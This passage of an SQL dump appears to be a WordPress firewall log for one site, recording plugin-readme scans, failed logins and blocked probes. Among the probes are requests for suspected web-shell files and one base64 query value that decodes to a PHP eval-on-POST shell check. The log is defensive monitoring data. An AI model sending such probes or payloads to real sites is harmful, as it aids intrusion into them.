Safari/537.36','logout',NULL,NULL),(134984,0.000000,1700517464.065967,0x00000000000000000000FFFF14DB3EB7,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134985,0.000000,1700517466.284025,0x00000000000000000000FFFF14DB3EB7,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134978,1700486974.239425,1700486974.218000,0x00000000000000000000FFFFB9A28217,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134977,1700486974.239579,1700486974.218000,0x00000000000000000000FFFFB9A28217,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134798,1700281929.814610,1700281929.802800,0x00000000000000000000FFFF5B5CF799,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134802,1700285136.189625,1700285136.167300,0x00000000000000000000FFFF8B3B4DD8,0,403,0,0,0,'https://eckankar-colorado.org/index.php?of=1&a=1','eckankar-colorado.org','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) colonel Chrome/196.3.1597.530 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgY29sb25lbCBDaHJvbWUvMTk2LjMuMTU5Ny41MzAgU2FmYXJpLzUzNy4zNg==\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134793,1700275357.347490,1700275357.339900,0x00000000000000000000FFFFD9A03CA2,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134794,0.000000,1700276026.308062,0x00000000000000000000FFFF671BEEFB,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134795,0.000000,1700278476.371794,0x00000000000000000000FFFF327466D3,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134796,0.000000,1700280912.852179,0x00000000000000000000FFFF8B3BA6E9,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134797,1700281929.814958,1700281929.802800,0x00000000000000000000FFFF5B5CF799,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134805,1700289388.356909,1700289388.334300,0x00000000000000000000FFFFC614F594,0,403,0,0,0,'https://eckankar-colorado.org/conf.php','eckankar-colorado.org','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) colonel Chrome/196.3.1597.530 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgY29sb25lbCBDaHJvbWUvMTk2LjMuMTU5Ny41MzAgU2FmYXJpLzUzNy4zNg==\",\"path\":\"L2NvbmYucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134801,1700284254.606912,1700284254.593700,0x00000000000000000000FFFFD9A03CA2,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134775,1700247562.720690,1700247562.699000,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/network/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsvd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134791,1700274688.162984,1700274688.159200,0x00000000000000000000FFFF68FE5AFB,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/royal-elementor-addons/readme.txt','http://eckankar-colorado.org/wp-content/plugins/royal-elementor-addons/readme.txt','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134776,1700247527.348681,1700247527.339700,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pomo/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BvbW8vd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134768,1700247356.909410,1700247356.900000,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/classic-editor/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jbGFzc2ljLWVkaXRvci93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134769,1700247424.788497,1700247424.779500,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134811,1700294237.066720,1700294237.044500,0x00000000000000000000FFFF14DB0858,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/press/wp-class.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wcmVzcy93cC1jbGFzcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134809,1700293629.485236,1700293629.478800,0x00000000000000000000FFFFD9A03CA2,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134810,1700294267.660483,1700294267.632900,0x00000000000000000000FFFF14DB0858,0,403,0,0,0,'https://eckankar-colorado.org/fm1.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ZtMS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134976,1700486972.796953,1700486972.772400,0x00000000000000000000FFFFB9A28217,0,200,0,0,0,'https://eckankar-colorado.org//wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3BsdWdpbnMvcm95YWwtZWxlbWVudG9yLWFkZG9ucy9yZWFkbWUudHh0\",\"path\":\"Ly93cC1jb250ZW50L3BsdWdpbnMvcm95YWwtZWxlbWVudG9yLWFkZG9ucy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134972,1700486178.644522,1700486178.624300,0x00000000000000000000FFFFB9A28217,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134973,1700486178.644369,1700486178.624300,0x00000000000000000000FFFFB9A28217,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134974,1700486670.992894,1700486670.967600,0x00000000000000000000FFFFB33C9378,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/css/colors/blue/blue.php?wall=ZWNobyBhRHJpdjQ7ZXZhbCgkX1BPU1RbJ3Z6J10pOw%3D%3D','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy9jb2xvcnMvYmx1ZS9ibHVlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(135013,1700527753.012388,1700527752.974600,0x00000000000000000000FFFF29D8BC5C,0,403,0,0,0,'https://www.eckankar-colorado.org/ms.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134987,1700518031.783313,1700518031.742600,0x00000000000000000000FFFF67BFF176,0,403,0,0,0,'https://eckankar-colorado.org/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134975,1700486972.797164,1700486972.772400,0x00000000000000000000FFFFB9A28217,0,200,0,0,0,'https://eckankar-colorado.org//wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"Ly93cC1jb250ZW50L3BsdWdpbnMvcm95YWwtZWxlbWVudG9yLWFkZG9ucy9yZWFkbWUudHh0\",\"path\":\"Ly93cC1jb250ZW50L3BsdWdpbnMvcm95YWwtZWxlbWVudG9yLWFkZG9ucy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134971,1700486177.328834,1700486177.303100,0x00000000000000000000FFFFB9A28217,0,200,0,0,0,'https://eckankar-colorado.org//wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3BsdWdpbnMvcm95YWwtZWxlbWVudG9yLWFkZG9ucy9yZWFkbWUudHh0\",\"path\":\"Ly93cC1jb250ZW50L3BsdWdpbnMvcm95YWwtZWxlbWVudG9yLWFkZG9ucy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134812,1700294320.726377,1700294320.704200,0x00000000000000000000FFFF14DB0858,0,403,0,0,0,'https://eckankar-colorado.org/M1.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L00xLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134813,1700294790.735645,1700294790.713600,0x00000000000000000000FFFF48A72CA2,0,403,0,0,0,'https://eckankar-colorado.org/406.shtml','http://eckankar-colorado.org/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzQwNi5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134814,0.000000,1700295432.648454,0x00000000000000000000FFFF23D10949,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134815,0.000000,1700296123.425824,0x00000000000000000000FFFFB4F291ED,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','https://shopxehoi.vn/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0','loginFailInvalidUsername',NULL,NULL),(134816,0.000000,1700297902.555247,0x00000000000000000000FFFF905B692C,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134817,0.000000,1700299625.049988,0x00000000000000000000FFFF68F44BF3,0,200,0,0,0,'https://mail.eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0','loginFailInvalidUsername',NULL,NULL),(134818,1700299708.271734,1700299708.263200,0x00000000000000000000FFFFB9C4DC1A,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/usc-e-shop/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91c2MtZS1zaG9wL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91c2MtZS1zaG9wL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134968,1700483124.205087,1700483124.185900,0x00000000000000000000FFFFD849A0DC,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/install.php','http://eckankar-colorado.org//wp-admin/install.php','Go-http-client/2.0','blocked:waf','WordPress New Install File Probing','{\"learningMode\":0,\"failedRules\":\"506\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWFkbWluL2luc3RhbGwucGhw\",\"path\":\"L3dwLWFkbWluL2luc3RhbGwucGhw\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134819,1700299708.270991,1700299708.263200,0x00000000000000000000FFFFB9C4DC1A,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/usc-e-shop/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91c2MtZS1zaG9wL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91c2MtZS1zaG9wL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134820,0.000000,1700300382.653204,0x00000000000000000000FFFFA290644D,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 